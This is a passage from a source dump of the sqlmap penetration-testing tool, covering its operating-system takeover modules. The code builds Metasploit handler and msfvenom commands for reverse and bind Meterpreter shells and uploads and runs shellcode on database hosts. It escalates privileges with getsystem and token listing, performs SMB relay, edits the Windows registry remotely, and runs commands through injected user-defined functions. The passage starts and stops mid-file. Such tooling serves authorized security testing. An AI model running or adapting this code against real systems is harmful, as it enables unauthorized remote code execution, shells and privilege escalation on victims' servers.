\"2\":\n                        _payloadStr = \"windows/meterpreter\"\n                        break\n\n                    elif choice == \"3\":\n                        _payloadStr = \"windows/shell\"\n                        break\n\n                    elif choice == \"1\":\n                        if Backend.isDbms(DBMS.PGSQL):\n                            logger.warning(\"beware that the VNC injection might not work\")\n                            break\n\n                        elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin((\"2005\", \"2008\")):\n                            break\n\n                    elif not isDigit(choice):\n                        logger.warning(\"invalid value, only digits are allowed\")\n\n                    elif int(choice) < 1 or int(choice) > 2:\n                        logger.warning(\"invalid value, it must be 1 or 2\")\n\n        if self.connectionStr.startswith(\"reverse_http\") and _payloadStr != \"windows/meterpreter\":\n            warnMsg = \"Reverse HTTP%s connection is only supported \" % (\"S\" if self.connectionStr.endswith(\"s\") else \"\")\n            warnMsg += \"with the Meterpreter payload. Falling back to \"\n            warnMsg += \"reverse TCP\"\n            logger.warning(warnMsg)\n\n            self.connectionStr = \"reverse_tcp\"\n\n        return _payloadStr\n\n    def _selectPort(self):\n        for connType, connStr in self._portData.items():\n            if self.connectionStr.startswith(connType):\n                return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535))\n\n    def _selectRhost(self):\n        if self.connectionStr.startswith(\"bind\"):\n            message = \"what is the back-end DBMS address? [Enter for '%s' (detected)] \" % self.remoteIP\n            address = readInput(message, default=self.remoteIP)\n\n            if not address:\n                address = self.remoteIP\n\n            return address\n\n        elif self.connectionStr.startswith(\"reverse\"):\n            return None\n\n        else:\n            raise SqlmapDataException(\"unexpected connection type\")\n\n    def _selectLhost(self):\n        if self.connectionStr.startswith(\"reverse\"):\n            message = \"what is the local address? [Enter for '%s' (detected)] \" % self.localIP\n            address = readInput(message, default=self.localIP)\n\n            if not address:\n                address = self.localIP\n\n            return address\n\n        elif self.connectionStr.startswith(\"bind\"):\n            return None\n\n        else:\n            raise SqlmapDataException(\"unexpected connection type\")\n\n    def _selectConnection(self):\n        return self._skeletonSelection(\"connection type\", self._msfConnectionsList)\n\n    def _prepareIngredients(self, encode=True):\n        self.connectionStr = self._selectConnection()\n        self.lhostStr = self._selectLhost()\n        self.rhostStr = self._selectRhost()\n        self.portStr = self._selectPort()\n        self.payloadStr = self._selectPayload()\n        self.encoderStr = self._selectEncoder(encode)\n        self.payloadConnStr = \"%s/%s\" % (self.payloadStr, self.connectionStr)\n\n    def _forgeMsfCliCmd(self, exitfunc=\"process\"):\n        if kb.oldMsf:\n            self._cliCmd = \"%s multi/handler PAYLOAD=%s\" % (self._msfCli, self.payloadConnStr)\n            self._cliCmd += \" EXITFUNC=%s\" % exitfunc\n            self._cliCmd += \" LPORT=%s\" % self.portStr\n\n            if self.connectionStr.startswith(\"bind\"):\n                self._cliCmd += \" RHOST=%s\" % self.rhostStr\n            elif self.connectionStr.startswith(\"reverse\"):\n                self._cliCmd += \" LHOST=%s\" % self.lhostStr\n            else:\n                raise SqlmapDataException(\"unexpected connection type\")\n\n            if Backend.isOs(OS.WINDOWS) and self.payloadStr == \"windows/vncinject\":\n                self._cliCmd += \" DisableCourtesyShell=true\"\n\n            self._cliCmd += \" E\"\n        else:\n            self._cliCmd = \"%s -L -x 'use multi/handler; set PAYLOAD %s\" % (self._msfConsole, self.payloadConnStr)\n            self._cliCmd += \"; set EXITFUNC %s\" % exitfunc\n            self._cliCmd += \"; set LPORT %s\" % self.portStr\n\n            if self.connectionStr.startswith(\"bind\"):\n                self._cliCmd += \"; set RHOST %s\" % self.rhostStr\n            elif self.connectionStr.startswith(\"reverse\"):\n                self._cliCmd += \"; set LHOST %s\" % self.lhostStr\n            else:\n                raise SqlmapDataException(\"unexpected connection type\")\n\n            if Backend.isOs(OS.WINDOWS) and self.payloadStr == \"windows/vncinject\":\n                self._cliCmd += \"; set DisableCourtesyShell true\"\n\n            self._cliCmd += \"; exploit'\"\n\n    def _forgeMsfCliCmdForSmbrelay(self):\n        self._prepareIngredients(encode=False)\n\n        if kb.oldMsf:\n            self._cliCmd = \"%s windows/smb/smb_relay PAYLOAD=%s\" % (self._msfCli, self.payloadConnStr)\n            self._cliCmd += \" EXITFUNC=thread\"\n            self._cliCmd += \" LPORT=%s\" % self.portStr\n            self._cliCmd += \" SRVHOST=%s\" % self.lhostStr\n            self._cliCmd += \" SRVPORT=%s\" % self._selectSMBPort()\n\n            if self.connectionStr.startswith(\"bind\"):\n                self._cliCmd += \" RHOST=%s\" % self.rhostStr\n            elif self.connectionStr.startswith(\"reverse\"):\n                self._cliCmd += \" LHOST=%s\" % self.lhostStr\n            else:\n                raise SqlmapDataException(\"unexpected connection type\")\n\n            self._cliCmd += \" E\"\n        else:\n            self._cliCmd = \"%s -x 'use windows/smb/smb_relay; set PAYLOAD %s\" % (self._msfConsole, self.payloadConnStr)\n            self._cliCmd += \"; set EXITFUNC thread\"\n            self._cliCmd += \"; set LPORT %s\" % self.portStr\n            self._cliCmd += \"; set SRVHOST %s\" % self.lhostStr\n            self._cliCmd += \"; set SRVPORT %s\" % self._selectSMBPort()\n\n            if self.connectionStr.startswith(\"bind\"):\n                self._cliCmd += \"; set RHOST %s\" % self.rhostStr\n            elif self.connectionStr.startswith(\"reverse\"):\n                self._cliCmd += \"; set LHOST %s\" % self.lhostStr\n            else:\n                raise SqlmapDataException(\"unexpected connection type\")\n\n            self._cliCmd += \"; exploit'\"\n\n    def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None):\n        if kb.oldMsf:\n            self._payloadCmd = self._msfPayload\n        else:\n            self._payloadCmd = \"%s -p\" % self._msfVenom\n\n        self._payloadCmd += \" %s\" % self.payloadConnStr\n        self._payloadCmd += \" EXITFUNC=%s\" % exitfunc\n        self._payloadCmd += \" LPORT=%s\" % self.portStr\n\n        if self.connectionStr.startswith(\"reverse\"):\n            self._payloadCmd += \" LHOST=%s\" % self.lhostStr\n        elif not self.connectionStr.startswith(\"bind\"):\n            raise SqlmapDataException(\"unexpected connection type\")\n\n        if Backend.isOs(OS.LINUX) and conf.privEsc:\n            self._payloadCmd += \" PrependChrootBreak=true PrependSetuid=true\"\n\n        if kb.oldMsf:\n            if extra == \"BufferRegister=EAX\":\n                self._payloadCmd += \" R | %s -a x86 -e %s -o \\\"%s\\\" -t %s\" % (self._msfEncode, self.encoderStr, outFile, format)\n\n                if extra is not None:\n                    self._payloadCmd += \" %s\" % extra\n            else:\n                self._payloadCmd += \" X > \\\"%s\\\"\" % outFile\n        else:\n            if extra == \"BufferRegister=EAX\":\n                self._payloadCmd += \" -a x86 -e %s -f %s\" % (self.encoderStr, format)\n\n                if extra is not None:\n                    self._payloadCmd += \" %s\" % extra\n\n                self._payloadCmd += \" > \\\"%s\\\"\" % outFile\n            else:\n                self._payloadCmd += \" -f exe > \\\"%s\\\"\" % outFile\n\n    def _runMsfCliSmbrelay(self):\n        self._forgeMsfCliCmdForSmbrelay()\n\n        infoMsg = \"running Metasploit Framework command line \"\n        infoMsg += \"interface locally, please wait..\"\n        logger.info(infoMsg)\n\n        logger.debug(\"executing local command: %s\" % self._cliCmd)\n        self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)\n\n    def _runMsfCli(self, exitfunc):\n        self._forgeMsfCliCmd(exitfunc)\n\n        infoMsg = \"running Metasploit Framework command line \"\n        infoMsg += \"interface locally, please wait..\"\n        logger.info(infoMsg)\n\n        logger.debug(\"executing local command: %s\" % self._cliCmd)\n        self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)\n\n    def _runMsfShellcodeRemote(self):\n        infoMsg = \"running Metasploit Framework shellcode \"\n        infoMsg += \"remotely via UDF 'sys_bineval', please wait..\"\n        logger.info(infoMsg)\n\n        self.udfExecCmd(\"'%s'\" % self.shellcodeString, silent=True, udfName=\"sys_bineval\")\n\n    def _runMsfShellcodeRemoteViaSexec(self):\n        infoMsg = \"running Metasploit Framework shellcode remotely \"\n        infoMsg += \"via shellcodeexec, please wait..\"\n        logger.info(infoMsg)\n\n        if not Backend.isOs(OS.WINDOWS):\n            self.execCmd(\"chmod +x %s\" % self.shellcodeexecRemote, silent=True)\n            cmd = \"%s %s &\" % (self.shellcodeexecRemote, self.shellcodeString)\n        else:\n            cmd = \"\\\"%s\\\" %s\" % (self.shellcodeexecRemote, self.shellcodeString)\n\n        self.execCmd(cmd, silent=True)\n\n    def _loadMetExtensions(self, proc, metSess):\n        if not Backend.isOs(OS.WINDOWS):\n            return\n\n        send_all(proc, \"use espia\\n\")\n        send_all(proc, \"use incognito\\n\")\n\n        # This extension is loaded by default since Metasploit > 3.7:\n        # send_all(proc, \"use priv\\n\")\n\n        # This extension freezes the connection on 64-bit systems:\n        # send_all(proc, \"use sniffer\\n\")\n\n        send_all(proc, \"sysinfo\\n\")\n        send_all(proc, \"getuid\\n\")\n\n        if conf.privEsc:\n            print()\n\n            infoMsg = \"trying to escalate privileges using Meterpreter \"\n            infoMsg += \"'getsystem' command which tries different \"\n            infoMsg += \"techniques, including kitrap0d\"\n            logger.info(infoMsg)\n\n            send_all(proc, \"getsystem\\n\")\n\n            infoMsg = \"displaying the list of available Access Tokens. \"\n            infoMsg += \"Choose which user you want to impersonate by \"\n            infoMsg += \"using incognito's command 'impersonate_token' if \"\n            infoMsg += \"'getsystem' does not success to elevate privileges\"\n            logger.info(infoMsg)\n\n            send_all(proc, \"list_tokens -u\\n\")\n            send_all(proc, \"getuid\\n\")\n\n    def _controlMsfCmd(self, proc, func):\n        initialized = False\n        start_time = time.time()\n        stdin_fd = sys.stdin.fileno()\n\n        while True:\n            returncode = proc.poll()\n\n            if returncode is None:\n                # Child hasn't exited yet\n                pass\n            else:\n                logger.debug(\"connection closed properly\")\n                return returncode\n\n            try:\n                if IS_WIN:\n                    timeout = 3\n\n                    inp = b\"\"\n                    _ = time.time()\n\n                    while True:\n                        if msvcrt.kbhit():\n                            char = msvcrt.getche()\n\n                            if ord(char) == 13:     # enter_key\n                                break\n                            elif ord(char) >= 32:   # space_char\n                                inp += char\n\n                        if len(inp) == 0 and (time.time() - _) > timeout:\n                            break\n\n                    if len(inp) > 0:\n                        try:\n                            send_all(proc, inp)\n                        except (EOFError, IOError):\n                            # Probably the child has exited\n                            pass\n                else:\n                    ready_fds = select.select([stdin_fd], [], [], 1)\n\n                    if stdin_fd in ready_fds[0]:\n                        try:\n                            send_all(proc, blockingReadFromFD(stdin_fd))\n                        except (EOFError, IOError):\n                            # Probably the child has exited\n                            pass\n\n                out = recv_some(proc, t=.1, e=0)\n                blockingWriteToFD(sys.stdout.fileno(), getBytes(out))\n\n                # For --os-pwn and --os-bof\n                pwnBofCond = self.connectionStr.startswith(\"reverse\")\n                pwnBofCond &= any(_ in out for _ in (b\"Starting the payload handler\", b\"Started reverse\"))\n\n                # For --os-smbrelay\n                smbRelayCond = b\"Server started\" in out\n\n                if pwnBofCond or smbRelayCond:\n                    func()\n\n                timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT\n\n                if not initialized:\n                    match = re.search(b\"Meterpreter session ([\\\\d]+) opened\", out)\n\n                    if match:\n                        self._loadMetExtensions(proc, match.group(1))\n\n                        if \"shell\" in self.payloadStr:\n                            send_all(proc, \"whoami\\n\" if Backend.isOs(OS.WINDOWS) else \"uname -a ; id\\n\")\n                            time.sleep(2)\n\n                        initialized = True\n                    elif timeout:\n                        proc.kill()\n                        errMsg = \"timeout occurred while attempting \"\n                        errMsg += \"to open a remote session\"\n                        raise SqlmapGenericException(errMsg)\n\n            except select.error as ex:\n                # Reference: https://github.com/andymccurdy/redis-py/pull/743/commits/2b59b25bb08ea09e98aede1b1f23a270fc085a9f\n                if ex.args[0] == errno.EINTR:\n                    continue\n                else:\n                    return proc.returncode\n            except (EOFError, IOError):\n                return proc.returncode\n            except KeyboardInterrupt:\n                pass\n\n    def createMsfShellcode(self, exitfunc, format, extra, encode):\n        infoMsg = \"creating Metasploit Framework multi-stage shellcode \"\n        logger.info(infoMsg)\n\n        self._randStr = randomStr(lowercase=True)\n        self._shellcodeFilePath = os.path.join(conf.outputPath, \"tmpm%s\" % self._randStr)\n\n        Metasploit._initVars(self)\n        self._prepareIngredients(encode=encode)\n        self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra)\n\n        logger.debug(\"executing local command: %s\" % self._payloadCmd)\n        process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False)\n\n        dataToStdout(\"\\r[%s] [INFO] creation in progress \" % time.strftime(\"%X\"))\n        pollProcess(process)\n        payloadStderr = process.communicate()[1]\n\n        match = re.search(b\"(Total size:|Length:|succeeded with size|Final size of exe file:) ([\\\\d]+)\", payloadStderr)\n\n        if match:\n            payloadSize = int(match.group(2))\n\n            if extra == \"BufferRegister=EAX\":\n                payloadSize = payloadSize // 2\n\n            debugMsg = \"the shellcode size is %d bytes\" % payloadSize\n            logger.debug(debugMsg)\n        else:\n            errMsg = \"failed to create the shellcode ('%s')\" % getText(payloadStderr).replace(\"\\n\", \" \").replace(\"\\r\", \"\")\n            raise SqlmapFilePathException(errMsg)\n\n        self._shellcodeFP = open(self._shellcodeFilePath, \"rb\")\n        self.shellcodeString = getText(self._shellcodeFP.read())\n        self._shellcodeFP.close()\n\n        os.unlink(self._shellcodeFilePath)\n\n    def uploadShellcodeexec(self, web=False):\n        self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, \"shellcodeexec\")\n\n        if Backend.isOs(OS.WINDOWS):\n            self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, \"windows\", \"shellcodeexec.x%s.exe_\" % \"32\")\n            content = decloak(self.shellcodeexecLocal)\n            if SHELLCODEEXEC_RANDOM_STRING_MARKER in content:\n                content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, getBytes(randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))))\n                _ = cloak(data=content)\n                handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix=\"%s.exe_\" % \"32\")\n                os.close(handle)\n                with open(self.shellcodeexecLocal, \"w+b\") as f:\n                    f.write(_)\n        else:\n            self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, \"linux\", \"shellcodeexec.x%s_\" % Backend.getArch())\n\n        __basename = \"tmpse%s%s\" % (self._randStr, \".exe\" if Backend.isOs(OS.WINDOWS) else \"\")\n\n        self.shellcodeexecRemote = \"%s/%s\" % (conf.tmpPath, __basename)\n        self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote))\n\n        logger.info(\"uploading shellcodeexec to '%s'\" % self.shellcodeexecRemote)\n\n        if web:\n            written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal)\n        else:\n            written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, \"binary\", forceCheck=True)\n\n        if written is not True:\n            errMsg = \"there has been a problem uploading shellcodeexec. It \"\n            errMsg += \"looks like the binary file has not been written \"\n            errMsg += \"on the database underlying file system or an AV has \"\n            errMsg += \"flagged it as malicious and removed it\"\n            logger.error(errMsg)\n\n            return False\n        else:\n            logger.info(\"shellcodeexec successfully uploaded\")\n            return True\n\n    def pwn(self, goUdf=False):\n        if goUdf:\n            exitfunc = \"thread\"\n            func = self._runMsfShellcodeRemote\n        else:\n            exitfunc = \"process\"\n            func = self._runMsfShellcodeRemoteViaSexec\n\n        self._runMsfCli(exitfunc=exitfunc)\n\n        if self.connectionStr.startswith(\"bind\"):\n            func()\n\n        debugMsg = \"Metasploit Framework command line interface exited \"\n        debugMsg += \"with return code %s\" % self._controlMsfCmd(self._msfCliProc, func)\n        logger.debug(debugMsg)\n\n        if not goUdf:\n            time.sleep(1)\n            self.delRemoteFile(self.shellcodeexecRemote)\n\n    def smb(self):\n        Metasploit._initVars(self)\n        self._randFile = \"tmpu%s.txt\" % randomStr(lowercase=True)\n\n        self._runMsfCliSmbrelay()\n\n        if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL):\n            self.uncPath = r\"\\\\\\\\%s\\\\%s\" % (self.lhostStr, self._randFile)\n        else:\n            self.uncPath = r\"\\\\%s\\%s\" % (self.lhostStr, self._randFile)\n\n        debugMsg = \"Metasploit Framework console exited with return \"\n        debugMsg += \"code %s\" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest)\n        logger.debug(debugMsg)\n\n    def bof(self):\n        self._runMsfCli(exitfunc=\"seh\")\n\n        if self.connectionStr.startswith(\"bind\"):\n            self.spHeapOverflow()\n\n        debugMsg = \"Metasploit Framework command line interface exited \"\n        debugMsg += \"with return code %s\" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow)\n        logger.debug(debugMsg)\n"
  },
  {
    "path": "sqlmap/lib/takeover/registry.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.common import openFile\nfrom lib.core.common import randomStr\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.enums import REGISTRY_OPERATION\n\nclass Registry(object):\n    \"\"\"\n    This class defines methods to read and write Windows registry keys\n    \"\"\"\n\n    def _initVars(self, regKey, regValue, regType=None, regData=None, parse=False):\n        self._regKey = regKey\n        self._regValue = regValue\n        self._regType = regType\n        self._regData = regData\n\n        self._randStr = randomStr(lowercase=True)\n        self._batPathRemote = \"%s/tmpr%s.bat\" % (conf.tmpPath, self._randStr)\n        self._batPathLocal = os.path.join(conf.outputPath, \"tmpr%s.bat\" % self._randStr)\n\n        if parse:\n            readParse = \"FOR /F \\\"tokens=*\\\" %%A IN ('REG QUERY \\\"\" + self._regKey + \"\\\" /v \\\"\" + self._regValue + \"\\\"') DO SET value=%%A\\r\\nECHO %value%\\r\\n\"\n        else:\n            readParse = \"REG QUERY \\\"\" + self._regKey + \"\\\" /v \\\"\" + self._regValue + \"\\\"\"\n\n        self._batRead = (\n            \"@ECHO OFF\\r\\n\",\n            readParse,\n        )\n\n        self._batAdd = (\n            \"@ECHO OFF\\r\\n\",\n            \"REG ADD \\\"%s\\\" /v \\\"%s\\\" /t %s /d %s /f\" % (self._regKey, self._regValue, self._regType, self._regData),\n        )\n\n        self._batDel = (\n            \"@ECHO OFF\\r\\n\",\n            \"REG DELETE \\\"%s\\\" /v \\\"%s\\\" /f\" % (self._regKey, self._regValue),\n        )\n\n    def _createLocalBatchFile(self):\n        self._batPathFp = openFile(self._batPathLocal, \"w\")\n\n        if self._operation == REGISTRY_OPERATION.READ:\n            lines = self._batRead\n        elif self._operation == REGISTRY_OPERATION.ADD:\n            lines = self._batAdd\n        elif self._operation == REGISTRY_OPERATION.DELETE:\n            lines = self._batDel\n\n        for line in lines:\n            self._batPathFp.write(line)\n\n        self._batPathFp.close()\n\n    def _createRemoteBatchFile(self):\n        logger.debug(\"creating batch file '%s'\" % self._batPathRemote)\n\n        self._createLocalBatchFile()\n        self.writeFile(self._batPathLocal, self._batPathRemote, \"text\", forceCheck=True)\n\n        os.unlink(self._batPathLocal)\n\n    def readRegKey(self, regKey, regValue, parse=False):\n        self._operation = REGISTRY_OPERATION.READ\n\n        Registry._initVars(self, regKey, regValue, parse=parse)\n        self._createRemoteBatchFile()\n\n        logger.debug(\"reading registry key '%s' value '%s'\" % (regKey, regValue))\n\n        data = self.evalCmd(self._batPathRemote)\n\n        if data and not parse:\n            pattern = '    '\n            index = data.find(pattern)\n            if index != -1:\n                data = data[index + len(pattern):]\n\n        self.delRemoteFile(self._batPathRemote)\n\n        return data\n\n    def addRegKey(self, regKey, regValue, regType, regData):\n        self._operation = REGISTRY_OPERATION.ADD\n\n        Registry._initVars(self, regKey, regValue, regType, regData)\n        self._createRemoteBatchFile()\n\n        debugMsg = \"adding registry key value '%s' \" % self._regValue\n        debugMsg += \"to registry key '%s'\" % self._regKey\n        logger.debug(debugMsg)\n\n        self.execCmd(cmd=self._batPathRemote)\n        self.delRemoteFile(self._batPathRemote)\n\n    def delRegKey(self, regKey, regValue):\n        self._operation = REGISTRY_OPERATION.DELETE\n\n        Registry._initVars(self, regKey, regValue)\n        self._createRemoteBatchFile()\n\n        debugMsg = \"deleting registry key value '%s' \" % self._regValue\n        debugMsg += \"from registry key '%s'\" % self._regKey\n        logger.debug(debugMsg)\n\n        self.execCmd(cmd=self._batPathRemote)\n        self.delRemoteFile(self._batPathRemote)\n"
  },
  {
    "path": "sqlmap/lib/takeover/udf.py",
    "content": "#!/usr/bin/env python\n\n\"\"\"\nCopyright (c) 2006-2022 sqlmap developers (https://sqlmap.org/)\nSee the file 'LICENSE' for copying permission\n\"\"\"\n\nimport os\n\nfrom lib.core.agent import agent\nfrom lib.core.common import Backend\nfrom lib.core.common import checkFile\nfrom lib.core.common import dataToStdout\nfrom lib.core.common import isDigit\nfrom lib.core.common import isStackingAvailable\nfrom lib.core.common import readInput\nfrom lib.core.common import unArrayizeValue\nfrom lib.core.compat import xrange\nfrom lib.core.data import conf\nfrom lib.core.data import logger\nfrom lib.core.data import queries\nfrom lib.core.enums import CHARSET_TYPE\nfrom lib.core.enums import DBMS\nfrom lib.core.enums import EXPECTED\nfrom lib.core.enums import OS\nfrom lib.core.exception import SqlmapFilePathException\nfrom lib.core.exception import SqlmapMissingMandatoryOptionException\nfrom lib.core.exception import SqlmapUnsupportedFeatureException\nfrom lib.core.exception import SqlmapUserQuitException\nfrom lib.core.unescaper import unescaper\nfrom lib.request import inject\n\nclass UDF(object):\n    \"\"\"\n    This class defines methods to deal with User-Defined Functions for\n    plugins.\n    \"\"\"\n\n    def __init__(self):\n        self.createdUdf = set()\n        self.udfs = {}\n        self.udfToCreate = set()\n\n    def _askOverwriteUdf(self, udf):\n        message = \"UDF '%s' already exists, do you \" % udf\n        message += \"want to overwrite it? [y/N] \"\n\n        return readInput(message, default='N', boolean=True)\n\n    def _checkExistUdf(self, udf):\n        logger.info(\"checking if UDF '%s' already exist\" % udf)\n\n        query = agent.forgeCaseStatement(queries[Backend.getIdentifiedDbms()].check_udf.query % (udf, udf))\n        return inject.getValue(query, resumeValue=False, expected=EXPECTED.BOOL, charsetType=CHARSET_TYPE.BINARY)\n\n    def udfCheckAndOverwrite(self, udf):\n        exists = self._checkExistUdf(udf)\n        overwrite = True\n\n        if exists:\n            overwrite = self._askOverwriteUdf(udf)\n\n        if overwrite:\n            self.udfToCreate.add(udf)\n\n    def udfCreateSupportTbl(self, dataType):\n        debugMsg = \"creating a support table for user-defined functions\"\n        logger.debug(debugMsg)\n\n        self.createSupportTbl(self.cmdTblName, self.tblField, dataType)\n\n    def udfForgeCmd(self, cmd):\n        if not cmd.startswith(\"'\"):\n            cmd = \"'%s\" % cmd\n\n        if not cmd.endswith(\"'\"):\n            cmd = \"%s'\" % cmd\n\n        return cmd\n\n    def udfExecCmd(self, cmd, silent=False, udfName=None):\n        if udfName is None:\n            udfName = \"sys_exec\"\n\n        cmd = unescaper.escape(self.udfForgeCmd(cmd))\n\n        return inject.goStacked(\"SELECT %s(%s)\" % (udfName, cmd), silent)\n\n    def udfEvalCmd(self, cmd, first=None, last=None, udfName=None):\n        if udfName is None:\n            udfName = \"sys_eval\"\n\n        if conf.direct:\n            output = self.udfExecCmd(cmd, udfName=udfName)\n\n            if output and isinstance(output, (list, tuple)):\n                new_output = \"\"\n\n                for line in output:\n                    new_output += line.replace(\"\\r\", \"\\n\")\n\n                output = new_output\n        else:\n            cmd = unescaper.escape(self.udfForgeCmd(cmd))\n\n            inject.goStacked(\"INSERT INTO %s(%s) VALUES (%s(%s))\" % (self.cmdTblName, self.tblField, udfName, cmd))\n            output = unArrayizeValue(inject.getValue(\"SELECT %s FROM %s\" % (self.tblField, self.cmdTblName), resumeValue=False, firstChar=first, lastChar=last, safeCharEncode=False))\n            inject.goStacked(\"DELETE FROM %s\" % self.cmdTblName)\n\n        return output\n\n    def udfCheckNeeded(self):\n        if (not any((conf.fileRead, conf.commonFiles)) or (any((conf.fileRead, conf.commonFiles)) and not Backend.isDbms(DBMS.PGSQL))) and \"sys_fileread\" in self.sysUdfs:\n            self.sysUdfs.pop(\"sys_fileread\")\n\n        if not conf.osPwn:\n            self.sysUdfs.pop(\"sys_bineval\")\n\n        if not conf.osCmd and not conf.osShell and not conf.regRead:\n            self.sysUdfs.pop(\"sys_eval\")\n\n            if not conf.osPwn and not conf.regAdd and not conf.regDel:\n                self.sysUdfs.pop(\"sys_exec\")\n\n    def udfSetRemotePath(self):\n        errMsg = \"udfSetRemotePath() method must be defined within the plugin\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def udfSetLocalPaths(self):\n        errMsg = \"udfSetLocalPaths() method must be defined within the plugin\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def udfCreateFromSharedLib(self, udf, inpRet):\n        errMsg = \"udfCreateFromSharedLib() method must be defined within the plugin\"\n        raise SqlmapUnsupportedFeatureException(errMsg)\n\n    def udfInjectCore(self, udfDict):\n        written = False\n\n        for udf in udfDict.keys():\n            if udf in self.createdUdf:\n                continue\n\n            self.udfCheckAndOverwrite(udf)\n\n        if len(self.udfToCreate) > 0:\n            self.udfSetRemotePath()\n            checkFile(self.udfLocalFile)\n            written = self.writeFile(self.udfLocalFile, self.udfRemoteFile, \"binary\", forceCheck=True)\n\n            if written is not True:\n                errMsg = \"there has been a problem uploading the shared library, \"\n                errMsg += \"it looks like the binary file has not been written \"\n                errMsg += \"on the database underlying file system\"\n                logger.error(errMsg)\n\n                message = \"do you want to proceed anyway? Beware that the \"\n                message += \"operating system takeover will fail [y/N] \"\n\n                if readInput(message, default='N', boolean=True):\n                    written = True\n                else:\n                    return False\n        else:\n            return True\n\n        for udf, inpRet in udfDict.items():\n            if udf in self.udfToCreate and udf not in self.createdUdf:\n                self.udfCreateFromSharedLib(udf, inpRet)\n\n        if Backend.isDbms(DBMS.MYSQL):\n            supportTblType = \"longtext\"\n        elif Backend.isDbms(DBMS.PGSQL):\n            supportTblType = \"text\"\n\n        self.udfCreateSupportTbl(supportTblType)\n\n        return written\n\n    def udfInjectSys(self):\n        self.udfSetLocalPaths()\n        self.udfCheckNeeded()\n        return self.udfInjectCore(self.sysUdfs)\n\n    def udfInjectCustom(self):\n        if Backend.getIdentifiedDbms() not in (DBMS.MYSQL, DBMS.PGSQL):\n            errMsg = \"UDF injection feature only works on MySQL and PostgreSQL\"\n            logger.error(errMsg)\n            return\n\n        if not isStackingAvailable() and not conf.direct:\n            errMsg = \"UDF injection feature requires stacked queries SQL injection\"\n            logger.error(errMsg)\n            return\n\n        self.checkDbmsOs()\n\n        if not self.isDba():\n            warnMsg = \"functionality requested probably does not work because \"\n            warnMsg += \"the current session user is not a database administrator\"\n            logger.warning(warnMsg)\n\n        if not conf.shLib:\n            msg = \"what is the local path of the shared library? \"\n\n            while True:\n                self.udfLocalFile = readInput(msg)\n\n                if self.udfLocalFile:\n                    break\n                else:\n                    logger.warning(\"you need to specify the local path of the shared library\")\n        else:\n            self.udfLocalFile = conf.shLib\n\n        if not os.path.exists(self.udfLocalFile):\n            errMsg = \"the specified shared library file does not exist\"\n            raise SqlmapFilePathException(errMsg)\n\n        if not self.udfLocalFile.endswith(\".dll\") and not self.udfLocalFile.endswith(\".so\"):\n            errMsg = \"shared library file must end with '.dll' or '.so'\"\n            raise SqlmapMissingMandatoryOptionException(errMsg)\n\n        elif self.udfLocalFile.endswith(\".so\") and Backend.isOs(OS.WINDOWS):\n            errMsg = \"you provided a shared object as shared library, but \"\n            errMsg += \"the database underlying operating system is Windows\"\n            raise SqlmapMissingMandatoryOptionException(errMsg)\n\n        elif self.udfLocalFile.endswith(\".dll\") and Backend.isOs(OS.LINUX):\n            errMsg = \"you provided a dynamic-link library as shared library, \"\n            errMsg += \"but the database underlying operating system is Linux\"\n            raise SqlmapMissingMandatoryOptionException(errMsg)\n\n        self.udfSharedLibName = os.path.basename(self.udfLocalFile).split(\".\")[0]\n        self.udfSharedLibExt = os.path.basename(self.udfLocalFile).split(\".\")[1]\n\n        msg = \"how many user-defined functions do you want to create \"\n        msg += \"from the shared library? \"\n\n        while True:\n            udfCount = readInput(msg, default='1')\n\n            if udfCount.isdigit():\n                udfCount = int(udfCount)\n\n                if udfCount <= 0:\n                    logger.info(\"nothing to inject then\")\n                    return\n                else:\n                    break\n            else:\n                logger.warning(\"invalid value, only digits are allowed\")\n\n        for x in xrange(0, udfCount):\n            while True:\n                msg = \"what is the name of the UDF number %d? \" % (x + 1)\n                udfName = readInput(msg)\n\n                if udfName:\n                    self.udfs[udfName] = {}\n                    break\n                else:\n                    logger.warning(\"you need to specify the name of the UDF\")\n\n            if Backend.isDbms(DBMS.MYSQL):\n                defaultType = \"string\"\n            elif Backend.isDbms(DBMS.PGSQL):\n                defaultType = \"text\"\n\n            self.udfs[udfName][\"input\"] = []\n\n            msg = \"how many input parameters takes UDF \"\n            msg += \"'%s'? (default: 1) \" % udfName\n\n            while True:\n                parCount = readInput(msg, default='1')\n\n                if parCount.isdigit() and int(parCount) >= 0:\n                    parCount = int(parCount)\n                    break\n\n                else:\n                    logger.warning(\"invalid value, only digits >= 0 are allowed\")\n\n            for y in xrange(0, parCount):\n                msg = \"what is the data-type of input parameter \"\n                msg += \"number %d? (default: %s) \" % ((y + 1), defaultType)\n\n                while True:\n                    parType = readInput(msg, default=defaultType).strip()\n\n                    if parType.isdigit():\n                        logger.warning(\"you need to specify the data-type of the parameter\")\n\n                    else:\n                        self.udfs[udfName][\"input\"].append(parType)\n                        break\n\n            msg = \"what is the data-type of the return \"\n            msg += \"value? (default: 